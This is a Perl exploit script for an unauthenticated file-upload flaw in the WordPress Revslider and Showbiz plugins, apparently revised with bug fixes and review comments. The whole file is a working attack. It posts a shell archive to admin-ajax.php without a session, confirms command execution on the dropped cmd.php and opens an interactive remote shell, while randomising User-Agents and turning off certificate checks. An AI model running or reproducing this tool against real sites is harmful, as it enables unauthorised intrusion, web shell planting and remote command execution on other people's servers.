#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use MIME::Base64;
# Clears the terminal and prints the tool header.  Pure output: it shells
# out to cls/clear (no arguments, so no quoting concerns) and writes the
# banner lines to STDOUT.
sub banner {
    my $clear_cmd = ( $^O eq 'MSWin32' ) ? 'cls' : 'clear';
    system($clear_cmd);

    my $rule = "===================================================";
    print "$rule\n";
    print "--- Revslider/Showbiz shell upload exploit\n";
    print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
    print "--- MorXploit Research www.MorXploit.com\n";
    print "$rule\n";
}
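# ---- command-line handling and payload selection ---------------------------
#
# Usage: perl $0 <target> <plugin>
#   <target>  base URL of the WordPress site, e.g. http://localhost
#   <plugin>  "revslider" or "showbiz"; picks the admin-ajax action name and
#             the local archive that is uploaded as a "plugin update".
#
# The archive (revslider.zip / showbiz.zip) is supplied by the operator next
# to this script and is not inspected here.  The probe further down expects
# it to unpack to <plugin>/cmd.php, a PHP stub that runs a base64-encoded
# "cmd" query parameter, so the archive must be built accordingly.

# Prints the usage lines and terminates.
sub usage {
    print "perl $0 <target> <plugin>\n";
    print "perl $0 http://localhost revslider\n";
    print "perl $0 http://localhost showbiz\n";
    exit;
}

# The original test was `defined($ARGV[0] && $ARGV[1])`, which only looks
# at $ARGV[1] when $ARGV[0] is true; a target of "0" slipped through with
# no plugin name.  Require both positional arguments explicitly.
if ( @ARGV < 2 ) {
    banner();
    usage();
}

my $zip1   = "revslider.zip";
my $zip2   = "showbiz.zip";
my $host   = $ARGV[0];
my $plugin = $ARGV[1];

# A trailing slash on the target would otherwise yield "//wp-admin/..." in
# every request URL built below.
$host =~ s{/+\z}{};

# Per-plugin admin-ajax action and the archive to send.  Only these two
# keys are accepted, so $plugin is safe to interpolate into paths later.
my %payload_for = (
    revslider => { action => "revslider_ajax_action", file => $zip1 },
    showbiz   => { action => "showbiz_ajax_action",   file => $zip2 },
);

my $action;
my $update_file;
if ( my $chosen = $payload_for{$plugin} ) {
    $action      = $chosen->{action};
    $update_file = $chosen->{file};
}
else {
    banner();
    print "[-] Wrong plugin name\n";
    usage();
}

# The original check was `-e ($zip1 && $zip2)`, which evaluates to
# `-e $zip2` only, so a missing revslider.zip was never detected.  Check
# the archive that is actually going to be uploaded.
unless ( -e $update_file ) {
    banner();
    print "[-] $update_file not found! RTFM\n";
    exit;
}

# WordPress AJAX endpoint shared by both plugins, and the path where the
# archive's cmd.php is expected to land.  The success check later treats
# the plugin's "Wrong update extracted folder" error as proof that the
# archive was unpacked into temp/update_extract/ before the folder name
# was validated (inferred from the original author's check, not verified
# against the plugin source here).
my $target = "wp-admin/admin-ajax.php";
my $shell  = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php";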
# Returns one desktop-browser User-Agent string picked uniformly at random
# from a fixed list, so repeated runs do not all present the same client.
sub randomagent {
    my @agents = (
        'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
        'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31',
    );
    my $pick = int rand @agents;
    return $agents[$pick];
}
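# ---- reachability probe and archive upload ---------------------------------
my $useragent = randomagent();

# verify_hostname => 0 accepts any certificate on https targets.  That is
# deliberate for a tool aimed at arbitrary hosts, but it also means this
# tool's own traffic, including the shell session later on, can be
# intercepted or redirected by anyone on the path.
my $ua = LWP::UserAgent->new( ssl_opts => { verify_hostname => 0 } );
$ua->timeout(10);
$ua->agent($useragent);

# Probe admin-ajax.php first so unreachable hosts fail early with the
# transport/HTTP status.  NOTE(review): this gate requires a 2xx on a bare
# GET; a target that answers an action-less request with a 4xx would be
# reported as "Xploit failed" here even though it is live.  Confirm against
# the WordPress versions in scope before relying on this check.
my $status = $ua->get("$host/$target");
unless ( $status->is_success ) {
    banner();
    print "[-] Xploit failed: " . $status->status_line . "\n";
    exit;
}

banner();
print "[*] Target set to $plugin\n";
print "[*] MorXploiting $host\n";

# Multipart POST mimicking the plugin's own "update_plugin" AJAX call with
# the archive attached as update_file.  The empty Cookie header is the
# point: no WordPress session is sent, so a successful upload demonstrates
# that the handler runs without authentication.
my $exploit = $ua->post(
    "$host/$target",
    Cookie       => "",
    Content_Type => "form-data",
    Content      => [
        action        => $action,
        client_action => "update_plugin",
        update_file   => [$update_file],
    ],
);
print "[*] Sent payload\n";

# Read the body once; decoded_content can be undef on an empty/unreadable
# response and every branch below pattern-matches on it.
my $body = $exploit->decoded_content;
$body = "" unless defined $body;

if ( $body =~ /Wrong update extracted folder/ ) {
    # Presumably the plugin only validates the folder name after unpacking
    # the archive, so this error is the success signal (cmd.php is on disk).
    # Inferred from the original author's check; not verified here.
    print "[+] Payload successfully executed\n";
}
elsif ( $body =~ /Wrong request/ ) {
    print "[-] Payload failed: Not vulnerable\n";
    exit;
}
elsif ( $body =~ /\A0\s*\z/ ) {
    # The original author maps a bare "0" reply from admin-ajax.php to
    # "plugin not available".  The original pattern was /0$/, which also
    # matched any response that merely ended in a "0"; anchor it.
    print "[-] Payload failed: Plugin unavailable\n";
    exit;
}
else {
    # Lift the message out of a PHP warning/error ("<b>...</b>: msg<br>");
    # fall back to dumping the whole body.  The capture is taken from the
    # match result instead of reading $1 after a possibly failed match.
    if ( my ($reason) = $body =~ m{</b>(.*?)<br>} ) {
        print "[-] Payload failed:$reason\n";
    }
    else {
        print "[-] Payload failed:\n";
        print "[-] $body";
    }
    print "\n";
    exit;
}
print "[*] Checking if shell was uploaded\n";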
# Builds a random string: the first argument is the length, the remaining
# arguments form the alphabet, sampled with replacement.  Used for the
# probe token that confirms remote command execution.
sub rndstr {
    my ( $length, @alphabet ) = @_;
    my @chars = map { $alphabet[ rand @alphabet ] } 1 .. $length;
    return join '', @chars;
}
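# ---- verify the dropped cmd.php and open an interactive session ------------
#
# cmd.php is shipped inside the operator's archive, not by this script.  The
# code below assumes it takes a base64-encoded command in the "cmd" query
# parameter and returns the command's output in the response body.

# Builds the URL for one remote command.  encode_base64 appends "\n" by
# default, and base64 output may contain '+', '/' and '=', none of which
# are safe raw in a query string ('+' in particular decodes to a space on
# the PHP side and silently corrupts the payload).  The original
# interpolated the raw value; percent-encode everything outside the
# unreserved set instead.
sub shell_url {
    my ($command) = @_;
    my $encoded = encode_base64( $command, '' );
    $encoded =~ s/([^A-Za-z0-9_.~-])/sprintf('%%%02X', ord $1)/ge;
    return "$host/$shell?cmd=$encoded";
}

# Sends one command through cmd.php and returns the HTTP::Response.
sub run_remote {
    my ($command) = @_;
    return $ua->get( shell_url($command) );
}

# Sends one command and returns its output as a string ("" when the
# response had no decodable body, so callers can print/chomp it safely).
sub remote_output {
    my ($command) = @_;
    my $out = run_remote($command)->decoded_content;
    return defined $out ? $out : "";
}

# Random 8-char token: echoed by the remote shell and searched for in the
# reply, so that command execution (not merely an HTTP 200) is confirmed.
my $token      = rndstr( 8, 1 .. 9, 'a' .. 'z' );
my $probe      = run_remote("echo $token");
my $probe_body = $probe->decoded_content;
$probe_body = "" unless defined $probe_body;

if ( $probe_body =~ / system \(\) has been disabled/ ) {
    # PHP's "system() has been disabled for security reasons" warning.
    print "[-] Xploit failed: system() has been disabled\n";
    exit;
}
elsif ( $probe_body !~ / \Q$token\E / ) {
    # The original pattern requires a space on either side of the token,
    # which ties this check to how the operator's cmd.php frames output.
    # Kept as-is; confirm it matches the cmd.php you ship.  \Q..\E is a
    # no-op for the current alphanumeric alphabet.
    print "[-] Xploit failed: " . $probe->status_line . "\n";
    exit;
}
print "[+] Shell successfully uploaded\n";

# Fingerprint the foothold once; user and hostname also feed the prompt.
my $user = remote_output("whoami");
my $node = remote_output("uname -n");
chomp $user;
chomp $node;
print remote_output("uname -a");
print remote_output("id");

# Interactive loop.  Stops on "exit" or EOF: the original never checked the
# result of <STDIN>, so a closed input spun forever sending "" as a command.
# Blank lines are not sent.  Every command travels base64-encoded in a GET
# query string, i.e. it lands in the target's access log in a trivially
# decodable form.
while (1) {
    print "\n$user\@$node:~\$ ";
    my $cmd = <STDIN>;
    last unless defined $cmd;
    chomp $cmd;
    if ( $cmd eq "exit" ) {
        print "Aurevoir!\n";
        exit;
    }
    next if $cmd eq "";
    print remote_output($cmd);
}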